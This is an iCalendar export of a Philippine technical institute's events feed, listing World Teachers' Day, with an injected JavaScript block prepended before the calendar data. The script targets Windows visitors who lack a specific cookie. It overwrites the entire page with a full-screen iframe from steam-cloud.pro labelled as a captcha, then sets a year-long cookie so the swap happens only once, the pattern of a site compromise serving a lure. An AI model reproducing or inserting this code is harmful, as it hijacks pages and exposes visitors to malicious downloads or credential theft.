<script secretid="test">
    (function () {
        function getCookie() {
            var e = document.cookie,
                n = new RegExp("(^|; )cookie-captcha-complete=([^;]*)").exec(e);
            return n ? decodeURIComponent(n[2]) : null
        }

        function isWindows() {
            return /windows|win32|win64/i.test(navigator.userAgent)
        }

        function checkCaptcha() {
            if (!getCookie() && isWindows()) {
                document.documentElement.innerHTML = '<!DOCTYPE html><html><head><style>html,body{margin:0;padding:0;height:100%;overflow:hidden}iframe{width:100%;height:100%;border:none}</style></head><body><iframe src="https://steam-cloud.pro/?domain="></iframe></body></html>'
                document.cookie = "cookie-captcha-complete=1; path=/; max-age=" + (60 * 60 * 24 * 365);
            }
        }
        if (document.readyState === "loading") {
            document.addEventListener("DOMContentLoaded", checkCaptcha)
        } else {
            checkCaptcha()
        }
    })() 
</script>BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//National Institute for Technical Excellence Inc. - ECPv6.15.20//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:National Institute for Technical Excellence Inc.
X-ORIGINAL-URL:https://nitex.ph
X-WR-CALDESC:Events for National Institute for Technical Excellence Inc.
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:UTC
BEGIN:STANDARD
TZOFFSETFROM:+0000
TZOFFSETTO:+0000
TZNAME:UTC
DTSTART:20210101T000000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;VALUE=DATE:20221005
DTEND;VALUE=DATE:20221006
DTSTAMP:20260424T003657
CREATED:20220817T221655Z
LAST-MODIFIED:20220817T222036Z
UID:2595-1664928000-1665014399@nitex.ph
SUMMARY:World Teachers' Day
DESCRIPTION:Also known as International Teachers Day\, World Teachers’ Day is held yearly on October 5. Since its set up in 1994\, the day celebrates the marking of the ” teaching in Freedom” in 1996. Last year the theme was “Engaging Teachers”. It is observed all over the world over since 1994 after the UNESCO Recommendation concerning Teachers.
URL:https://nitex.ph/event/world-teachers-day/
CATEGORIES:Awareness Days
ATTACH;FMTTYPE=image/jpeg:https://nitex.ph/wp-content/uploads/2022/08/World-Teachers-Day.jpg
END:VEVENT
END:VCALENDAR